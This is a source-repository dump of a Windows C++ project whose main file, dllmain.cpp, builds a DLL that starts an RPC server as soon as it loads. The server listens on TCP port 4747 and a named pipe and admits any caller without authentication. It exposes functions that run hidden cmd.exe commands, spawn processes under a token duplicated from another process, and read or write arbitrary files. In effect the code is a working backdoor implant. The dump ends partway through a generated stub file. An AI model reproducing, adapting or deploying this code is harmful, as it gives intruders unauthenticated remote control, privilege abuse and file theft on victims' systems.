cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | Source Files 43 | 44 | 45 | Source Files 46 | 47 | 48 | -------------------------------------------------------------------------------- /RpcServerDll/RpcServerDll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /RpcServerDll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../RpcServerInterface/RpcServerInterface.h" 5 | #include "../RpcServerInterface2/RpcServerInterface2.h" 6 | #include 7 | #include 8 | #include "Base64.h" 9 | 10 | void Execute(LPSTR* Command, LPSTR* Output) 11 | { 12 | // Prepebd "cmd.exe /c " to the command 13 | std::string command_with_prefix = std::string("cmd.exe /c ") + std::string(*Command); 14 | 15 | // Create pipes to read STDOUT 16 | HANDLE hPipeRead, hPipeWrite; 17 | SECURITY_ATTRIBUTES saAttr = { sizeof(SECURITY_ATTRIBUTES) }; 18 | saAttr.bInheritHandle = TRUE; 19 | saAttr.lpSecurityDescriptor = NULL; 20 | 21 | if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0)) 22 | { 23 | *Output = strdup("Execute Failed"); 24 | return; 25 | } 26 | 27 | // Prepare structs for CreateProcess 28 | STARTUPINFOA startupInfo = { sizeof(STARTUPINFOA) }; 29 | startupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 30 | startupInfo.hStdOutput = hPipeWrite; 31 | startupInfo.hStdError = hPipeWrite; 32 | startupInfo.wShowWindow = SW_HIDE; 33 | startupInfo.dwFlags |= STARTF_USESHOWWINDOW; 34 | 35 | PROCESS_INFORMATION processInformation = { 0 }; 36 | 37 | // Execute the command 38 | BOOL fSuccess = CreateProcessA(NULL, (LPSTR)command_with_prefix.c_str(), NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &startupInfo, &processInformation); 39 | if (!fSuccess) 40 | { 41 | CloseHandle(hPipeWrite); 42 | CloseHandle(hPipeRead); 43 | *Output = strdup("Execute Failed"); 44 | return; 45 | } 46 | 47 | // Read the output until the process terminates 48 | std::string output; 49 | bool bProcessEnded = false; 50 | while (!bProcessEnded) 51 | { 52 | bProcessEnded = WaitForSingleObject(processInformation.hProcess, 100) == WAIT_OBJECT_0; 53 | 54 | while (true) 55 | { 56 | char buf[1024]; 57 | DWORD dwRead = 0; 58 | DWORD dwAvail = 0; 59 | 60 | if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL)) 61 | break; 62 | 63 | if (!dwAvail) 64 | break; 65 | 66 | if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead) 67 | break; 68 | 69 | buf[dwRead] = 0; 70 | output += std::string(buf); 71 | } 72 | } 73 | 74 | // Clean up 75 | CloseHandle(hPipeWrite); 76 | CloseHandle(hPipeRead); 77 | CloseHandle(processInformation.hProcess); 78 | CloseHandle(processInformation.hThread); 79 | 80 | *Output = strdup(output.c_str()); 81 | } 82 | 83 | void ExecuteWithToken(LPSTR* Command, int ProcessId, LPSTR* Output) 84 | { 85 | // We need to convert the command to unicode for CreateProcessWithTokenW 86 | std::string command = std::string("/c ") + std::string(*Command); 87 | std::wstring command_w; 88 | command_w.assign(command.begin(), command.end()); 89 | 90 | // Create pipes to read STDOUT 91 | HANDLE hPipeRead, hPipeWrite; 92 | SECURITY_ATTRIBUTES saAttr = { sizeof(SECURITY_ATTRIBUTES) }; 93 | saAttr.bInheritHandle = TRUE; // Pipe handles are inherited by child process. 94 | saAttr.lpSecurityDescriptor = NULL; 95 | 96 | if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0)) 97 | { 98 | wprintf(L"Executtion failed (Error: %d).\n", GetLastError()); 99 | *Output = strdup("Execution failed"); 100 | return; 101 | } 102 | 103 | HANDLE tokenHandle = NULL; 104 | HANDLE duplicateTokenHandle = NULL; 105 | // Call OpenProcess to get a process handle 106 | HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, ProcessId); 107 | if (GetLastError() == NULL) 108 | printf("[+] OpenProcess() success!\n"); 109 | else 110 | { 111 | printf("[-] OpenProcess() Return Code: %i\n", processHandle); 112 | printf("[-] OpenProcess() Error: %i\n", GetLastError()); 113 | } 114 | 115 | // Call OpenProcessToken() to get a handle for the process token 116 | BOOL getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE, &tokenHandle); 117 | if (GetLastError() == NULL) 118 | printf("[+] OpenProcessToken() success!\n"); 119 | else 120 | { 121 | printf("[-] OpenProcessToken() Return Code: %i\n", getToken); 122 | printf("[-] OpenProcessToken() Error: %i\n", GetLastError()); 123 | } 124 | 125 | // Duplicate the process token 126 | BOOL duplicateToken = DuplicateTokenEx(tokenHandle, TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle); 127 | if (GetLastError() == NULL) 128 | printf("[+] DuplicateTokenEx() success!\n"); 129 | else 130 | { 131 | printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken); 132 | printf("[-] DupicateTokenEx() Error: %i\n", GetLastError()); 133 | } 134 | 135 | // Prepare structs for CreateProcessWithTokenW 136 | STARTUPINFOW startupInfo = { sizeof(STARTUPINFOW) }; 137 | startupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 138 | startupInfo.hStdOutput = hPipeWrite; 139 | startupInfo.hStdError = hPipeWrite; 140 | startupInfo.wShowWindow = SW_HIDE; 141 | startupInfo.dwFlags |= STARTF_USESHOWWINDOW; 142 | 143 | PROCESS_INFORMATION processInformation = { 0 }; 144 | // Call CreateProcessWithTokenW 145 | BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, 0, L"cmd.exe", (LPWSTR)command_w.c_str(), 0, NULL, NULL, &startupInfo, &processInformation); 146 | if (GetLastError() == NULL) 147 | printf("[+] Process spawned!\n"); 148 | else 149 | { 150 | printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess); 151 | printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError()); 152 | } 153 | 154 | if (!createProcess) { 155 | *Output = strdup("ExecuteWithToken Failed"); 156 | return; 157 | } 158 | 159 | // Read the output until the process terminates 160 | std::string output; 161 | bool bProcessEnded = false; 162 | while (!bProcessEnded) 163 | { 164 | bProcessEnded = WaitForSingleObject(processInformation.hProcess, 100) == WAIT_OBJECT_0; 165 | 166 | while (true) 167 | { 168 | char buf[1024]; 169 | DWORD dwRead = 0; 170 | DWORD dwAvail = 0; 171 | 172 | if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL)) 173 | break; 174 | 175 | if (!dwAvail) 176 | break; 177 | 178 | if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead) 179 | break; 180 | 181 | buf[dwRead] = 0; 182 | output += std::string(buf); 183 | } 184 | } 185 | 186 | // Clean up 187 | CloseHandle(processHandle); 188 | CloseHandle(tokenHandle); 189 | CloseHandle(duplicateTokenHandle); 190 | CloseHandle(hPipeWrite); 191 | CloseHandle(hPipeRead); 192 | CloseHandle(processInformation.hProcess); 193 | CloseHandle(processInformation.hThread); 194 | 195 | *Output = strdup(output.c_str()); 196 | } 197 | 198 | static char* ReadFile(LPSTR filename, int* length) 199 | { 200 | size_t size; 201 | 202 | // Open the file 203 | std::ifstream ifs(filename, std::ios::in | std::ios::binary | std::ios::ate); 204 | if (!ifs.is_open()) 205 | { 206 | *length = -1; 207 | return NULL; 208 | } 209 | 210 | // Get the file size 211 | ifs.seekg(0, std::ios::end); 212 | size = ifs.tellg(); 213 | ifs.seekg(0, std::ios::beg); 214 | char* pChars = new char[size]; 215 | 216 | // Read all bytes 217 | ifs.read(pChars, size); 218 | 219 | // Close the file and return the content and length 220 | ifs.close(); 221 | *length = size; 222 | 223 | // Base64 encode the file and return it 224 | std::string encoded = pChars; 225 | macaron::Base64 encoder; 226 | encoded = encoder.Encode(pChars, *length); 227 | 228 | return strdup(encoded.c_str()); 229 | } 230 | 231 | void Download(LPSTR* Path, LPSTR* Data) 232 | { 233 | int length = -1; 234 | *Data = ReadFile(*Path, &length); 235 | } 236 | 237 | void SaveFile(LPSTR path, char* buffer) 238 | { 239 | // Base64 decode the data 240 | macaron::Base64 encoder; 241 | char* decoded; 242 | int length; 243 | length = encoder.Decode(buffer, &decoded); 244 | 245 | // Save the data to the specified path 246 | std::ofstream ofs(path, std::ios::out | std::ios::binary); 247 | ofs.write(decoded, length); 248 | ofs.close(); 249 | } 250 | 251 | void Upload(LPSTR* Path, LPSTR* Data) 252 | { 253 | SaveFile(*Path, *Data); 254 | } 255 | 256 | void Shutdown() 257 | { 258 | RPC_STATUS status; 259 | 260 | status = RpcMgmtStopServerListening(NULL); 261 | 262 | if (status) 263 | { 264 | exit(status); 265 | } 266 | 267 | status = RpcServerUnregisterIf(NULL, NULL, FALSE); 268 | 269 | if (status) 270 | { 271 | exit(status); 272 | } 273 | 274 | ExitThread(0); 275 | } 276 | void Shutdown2() 277 | { 278 | Shutdown(); 279 | } 280 | 281 | void* __RPC_USER midl_user_allocate(size_t size) 282 | { 283 | return malloc(size); 284 | } 285 | 286 | void __RPC_USER midl_user_free(void* p) 287 | { 288 | free(p); 289 | } 290 | 291 | 292 | RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE, void*) 293 | { 294 | return RPC_S_OK; // Always allow anyone 295 | } 296 | 297 | 298 | __declspec(dllexport) int StartServer() 299 | { 300 | RPC_STATUS status; 301 | 302 | // Register TCP/IP endpoint 303 | status = RpcServerUseProtseqEp( 304 | (RPC_WSTR)L"ncacn_ip_tcp", 305 | RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 306 | (RPC_WSTR)L"4747", // TCP/IP port to use. 307 | NULL); 308 | 309 | if (status) 310 | exit(status); 311 | 312 | // Registers the first interface 313 | status = RpcServerRegisterIf2( 314 | RpcServerInterface_v1_0_s_ifspec, 315 | NULL, 316 | NULL, 317 | RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, 318 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, 319 | (unsigned)-1, 320 | SecurityCallback); 321 | 322 | if (status) 323 | exit(status); 324 | 325 | // Register named pipes endpoint 326 | status = RpcServerUseProtseqEp( 327 | (RPC_WSTR)L"ncacn_np", 328 | RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 329 | (RPC_WSTR)L"\\pipe\\atctl", // Hard-coded pipe name 330 | NULL); 331 | 332 | if (status) 333 | exit(status); 334 | 335 | // Registers the second interface 336 | status = RpcServerRegisterIf2( 337 | RpcServerInterface2_v1_0_s_ifspec, 338 | NULL, 339 | NULL, 340 | RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, 341 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, 342 | (unsigned)-1, 343 | SecurityCallback); 344 | 345 | if (status) 346 | exit(status); 347 | 348 | status = RpcServerListen( 349 | 2, // Recommended minimum number of threads 350 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, // Recommended maximum number of threads 351 | FALSE); 352 | 353 | if (status) 354 | exit(status); 355 | } 356 | 357 | 358 | 359 | BOOL APIENTRY DllMain( HMODULE hModule, 360 | DWORD ul_reason_for_call, 361 | LPVOID lpReserved 362 | ) 363 | { 364 | switch (ul_reason_for_call) 365 | { 366 | case DLL_PROCESS_ATTACH: 367 | CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartServer, 0, 0, 0); 368 | case DLL_THREAD_ATTACH: 369 | case DLL_THREAD_DETACH: 370 | case DLL_PROCESS_DETACH: 371 | break; 372 | } 373 | return TRUE; 374 | } 375 | 376 | -------------------------------------------------------------------------------- /RpcServerDll/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 4 | // Windows Header Files 5 | #include 6 | -------------------------------------------------------------------------------- /RpcServerDll/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 6 | -------------------------------------------------------------------------------- /RpcServerDll/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | 13 | #endif //PCH_H 14 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.acf: -------------------------------------------------------------------------------- 1 | // File RpcServerInterface.acf 2 | [ 3 | // This interface will use an implicit binding handle named hRpcServerInterfaceBinding. 4 | implicit_handle(handle_t hRpcServerInterfaceBinding) 5 | ] 6 | interface RpcServerInterface // The interface is named RpcServerInterface 7 | { 8 | } 9 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | 20 | 21 | /* verify that the version is high enough to compile this file*/ 22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500 24 | #endif 25 | 26 | #include "rpc.h" 27 | #include "rpcndr.h" 28 | 29 | #ifndef __RPCNDR_H_VERSION__ 30 | #error this stub requires an updated version of 31 | #endif /* __RPCNDR_H_VERSION__ */ 32 | 33 | 34 | #ifndef __RpcServerInterface_h__ 35 | #define __RpcServerInterface_h__ 36 | 37 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 38 | #pragma once 39 | #endif 40 | 41 | /* Forward Declarations */ 42 | 43 | /* header files for imported files */ 44 | #include "oaidl.h" 45 | 46 | #ifdef __cplusplus 47 | extern "C"{ 48 | #endif 49 | 50 | 51 | #ifndef __RpcServerInterface_INTERFACE_DEFINED__ 52 | #define __RpcServerInterface_INTERFACE_DEFINED__ 53 | 54 | /* interface RpcServerInterface */ 55 | /* [implicit_handle][version][uuid] */ 56 | 57 | void Execute( 58 | /* [in] */ LPSTR *Command, 59 | /* [out] */ LPSTR *Output); 60 | 61 | void ExecuteWithToken( 62 | /* [in] */ LPSTR *Command, 63 | /* [in] */ int ProcessId, 64 | /* [out] */ LPSTR *Output); 65 | 66 | void Download( 67 | /* [in] */ LPSTR *Path, 68 | /* [out] */ LPSTR *Data); 69 | 70 | void Upload( 71 | /* [in] */ LPSTR *Path, 72 | /* [in] */ LPSTR *Data); 73 | 74 | void Shutdown( void); 75 | 76 | 77 | extern handle_t hRpcServerInterfaceBinding; 78 | 79 | 80 | extern RPC_IF_HANDLE RpcServerInterface_v1_0_c_ifspec; 81 | extern RPC_IF_HANDLE RpcServerInterface_v1_0_s_ifspec; 82 | #endif /* __RpcServerInterface_INTERFACE_DEFINED__ */ 83 | 84 | /* Additional Prototypes for ALL interfaces */ 85 | 86 | /* end of Additional Prototypes */ 87 | 88 | #ifdef __cplusplus 89 | } 90 | #endif 91 | 92 | #endif 93 | 94 | 95 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.idl: -------------------------------------------------------------------------------- 1 | // File RpcServerInterface.idl 2 | import "oaidl.idl"; 3 | [ 4 | // A unique identifier that distinguishes this interface from other interfaces. 5 | uuid(fa161e81-6e93-4f41-961c-ee9c2e75de17), 6 | 7 | // This is version 1.0 of this interface. 8 | version(1.0) 9 | ] 10 | interface RpcServerInterface // The interface is named RpcServerInterface 11 | { 12 | void Execute( 13 | [in] LPSTR* Command, 14 | [out] LPSTR* Output 15 | ); 16 | 17 | void ExecuteWithToken( 18 | [in] LPSTR* Command, 19 | [in] int ProcessId, 20 | [out] LPSTR* Output 21 | ); 22 | 23 | void Download( 24 | [in] LPSTR* Path, 25 | [out] LPSTR* Data 26 | ); 27 | 28 | void Upload( 29 | [in] LPSTR* Path, 30 | [in] LPSTR* Data 31 | ); 32 | 33 | void Shutdown(void); 34 | } 35 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {6536EBEC-014E-4D6B-97BE-223137694CA8} 23 | Win32Proj 24 | RpcServerInterface 25 | 10.0 26 | 27 | 28 | 29 | Utility 30 | MultiByte 31 | v143 32 | 33 | 34 | Utility 35 | MultiByte 36 | v143 37 | 38 | 39 | Utility 40 | MultiByte 41 | v143 42 | 43 | 44 | Utility 45 | MultiByte 46 | v143 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | <_ProjectFileVersion>10.0.40219.1 66 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 67 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 68 | true 69 | true 70 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 71 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 72 | false 73 | false 74 | 75 | 76 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 77 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 78 | 79 | 80 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 81 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 82 | 83 | 84 | 85 | Disabled 86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 87 | true 88 | EnableFastChecks 89 | MultiThreadedDebug 90 | true 91 | true 92 | true 93 | 94 | 95 | Level4 96 | EditAndContinue 97 | 98 | 99 | $(OutDir)RpcServerInterface.exe 100 | true 101 | $(OutDir)RpcServerInterface.pdb 102 | Console 103 | MachineX86 104 | 105 | 106 | 4 107 | Ascii 108 | false 109 | %(Filename).h 110 | 111 | 112 | 113 | 114 | Disabled 115 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 116 | EnableFastChecks 117 | MultiThreadedDebug 118 | true 119 | true 120 | true 121 | 122 | 123 | Level4 124 | ProgramDatabase 125 | 126 | 127 | $(OutDir)RpcServerInterface.exe 128 | true 129 | $(OutDir)RpcServerInterface.pdb 130 | Console 131 | 132 | 133 | 4 134 | Ascii 135 | false 136 | %(Filename).h 137 | 138 | 139 | 140 | 141 | MaxSpeed 142 | OnlyExplicitInline 143 | true 144 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 145 | true 146 | MultiThreaded 147 | true 148 | true 149 | true 150 | true 151 | 152 | 153 | Level4 154 | ProgramDatabase 155 | 156 | 157 | $(OutDir)RpcServerInterface.exe 158 | true 159 | Console 160 | true 161 | true 162 | MachineX86 163 | 164 | 165 | 4 166 | Ascii 167 | false 168 | %(Filename).h 169 | 170 | 171 | 172 | 173 | MaxSpeed 174 | OnlyExplicitInline 175 | true 176 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 177 | true 178 | MultiThreaded 179 | true 180 | true 181 | true 182 | true 183 | 184 | 185 | Level4 186 | ProgramDatabase 187 | 188 | 189 | $(OutDir)RpcServerInterface.exe 190 | true 191 | Console 192 | true 193 | true 194 | 195 | 196 | 4 197 | Ascii 198 | false 199 | %(Filename).h 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface_s.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | #if defined(_M_AMD64) 20 | 21 | 22 | #if _MSC_VER >= 1200 23 | #pragma warning(push) 24 | #endif 25 | 26 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 27 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 28 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/ 29 | 30 | #include 31 | #include "RpcServerInterface.h" 32 | 33 | #define TYPE_FORMAT_STRING_SIZE 11 34 | #define PROC_FORMAT_STRING_SIZE 185 35 | #define EXPR_FORMAT_STRING_SIZE 1 36 | #define TRANSMIT_AS_TABLE_SIZE 0 37 | #define WIRE_MARSHAL_TABLE_SIZE 0 38 | 39 | typedef struct _RpcServerInterface_MIDL_TYPE_FORMAT_STRING 40 | { 41 | short Pad; 42 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 43 | } RpcServerInterface_MIDL_TYPE_FORMAT_STRING; 44 | 45 | typedef struct _RpcServerInterface_MIDL_PROC_FORMAT_STRING 46 | { 47 | short Pad; 48 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 49 | } RpcServerInterface_MIDL_PROC_FORMAT_STRING; 50 | 51 | typedef struct _RpcServerInterface_MIDL_EXPR_FORMAT_STRING 52 | { 53 | long Pad; 54 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 55 | } RpcServerInterface_MIDL_EXPR_FORMAT_STRING; 56 | 57 | 58 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 59 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 60 | 61 | static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = 62 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; 63 | 64 | 65 | extern const RpcServerInterface_MIDL_TYPE_FORMAT_STRING RpcServerInterface__MIDL_TypeFormatString; 66 | extern const RpcServerInterface_MIDL_PROC_FORMAT_STRING RpcServerInterface__MIDL_ProcFormatString; 67 | extern const RpcServerInterface_MIDL_EXPR_FORMAT_STRING RpcServerInterface__MIDL_ExprFormatString; 68 | 69 | /* Standard interface: RpcServerInterface, ver. 1.0, 70 | GUID={0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x17}} */ 71 | 72 | 73 | extern const MIDL_SERVER_INFO RpcServerInterface_ServerInfo; 74 | 75 | extern const RPC_DISPATCH_TABLE RpcServerInterface_v1_0_DispatchTable; 76 | 77 | static const RPC_SERVER_INTERFACE RpcServerInterface___RpcServerInterface = 78 | { 79 | sizeof(RPC_SERVER_INTERFACE), 80 | {{0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x17}},{1,0}}, 81 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 82 | (RPC_DISPATCH_TABLE*)&RpcServerInterface_v1_0_DispatchTable, 83 | 0, 84 | 0, 85 | 0, 86 | &RpcServerInterface_ServerInfo, 87 | 0x06000000 88 | }; 89 | RPC_IF_HANDLE RpcServerInterface_v1_0_s_ifspec = (RPC_IF_HANDLE)& RpcServerInterface___RpcServerInterface; 90 | 91 | extern const MIDL_STUB_DESC RpcServerInterface_StubDesc; 92 | 93 | 94 | #if !defined(__RPC_WIN64__) 95 | #error Invalid build platform for this stub. 96 | #endif 97 | 98 | static const RpcServerInterface_MIDL_PROC_FORMAT_STRING RpcServerInterface__MIDL_ProcFormatString = 99 | { 100 | 0, 101 | { 102 | 103 | /* Procedure Execute */ 104 | 105 | 0x32, /* FC_BIND_PRIMITIVE */ 106 | 0x48, /* Old Flags: */ 107 | /* 2 */ NdrFcLong( 0x0 ), /* 0 */ 108 | /* 6 */ NdrFcShort( 0x0 ), /* 0 */ 109 | /* 8 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 110 | /* 10 */ NdrFcShort( 0x0 ), /* 0 */ 111 | /* 12 */ NdrFcShort( 0x0 ), /* 0 */ 112 | /* 14 */ 0x43, /* Oi2 Flags: srv must size, clt must size, has ext, */ 113 | 0x2, /* 2 */ 114 | /* 16 */ 0xa, /* 10 */ 115 | 0x1, /* Ext Flags: new corr desc, */ 116 | /* 18 */ NdrFcShort( 0x0 ), /* 0 */ 117 | /* 20 */ NdrFcShort( 0x0 ), /* 0 */ 118 | /* 22 */ NdrFcShort( 0x0 ), /* 0 */ 119 | /* 24 */ NdrFcShort( 0x0 ), /* 0 */ 120 | 121 | /* Parameter Command */ 122 | 123 | /* 26 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 124 | /* 28 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 125 | /* 30 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 126 | 127 | /* Parameter Output */ 128 | 129 | /* 32 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 130 | /* 34 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 131 | /* 36 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 132 | 133 | /* Procedure ExecuteWithToken */ 134 | 135 | /* 38 */ 0x32, /* FC_BIND_PRIMITIVE */ 136 | 0x48, /* Old Flags: */ 137 | /* 40 */ NdrFcLong( 0x0 ), /* 0 */ 138 | /* 44 */ NdrFcShort( 0x1 ), /* 1 */ 139 | /* 46 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 140 | /* 48 */ NdrFcShort( 0x8 ), /* 8 */ 141 | /* 50 */ NdrFcShort( 0x0 ), /* 0 */ 142 | /* 52 */ 0x43, /* Oi2 Flags: srv must size, clt must size, has ext, */ 143 | 0x3, /* 3 */ 144 | /* 54 */ 0xa, /* 10 */ 145 | 0x1, /* Ext Flags: new corr desc, */ 146 | /* 56 */ NdrFcShort( 0x0 ), /* 0 */ 147 | /* 58 */ NdrFcShort( 0x0 ), /* 0 */ 148 | /* 60 */ NdrFcShort( 0x0 ), /* 0 */ 149 | /* 62 */ NdrFcShort( 0x0 ), /* 0 */ 150 | 151 | /* Parameter Command */ 152 | 153 | /* 64 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 154 | /* 66 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 155 | /* 68 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 156 | 157 | /* Parameter ProcessId */ 158 | 159 | /* 70 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 160 | /* 72 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 161 | /* 74 */ 0x8, /* FC_LONG */ 162 | 0x0, /* 0 */ 163 | 164 | /* Parameter Output */ 165 | 166 | /* 76 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 167 | /* 78 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 168 | /* 80 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 169 | 170 | /* Procedure Download */ 171 | 172 | /* 82 */ 0x32, /* FC_BIND_PRIMITIVE */ 173 | 0x48, /* Old Flags: */ 174 | /* 84 */ NdrFcLong( 0x0 ), /* 0 */ 175 | /* 88 */ NdrFcShort( 0x2 ), /* 2 */ 176 | /* 90 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 177 | /* 92 */ NdrFcShort( 0x0 ), /* 0 */ 178 | /* 94 */ NdrFcShort( 0x0 ), /* 0 */ 179 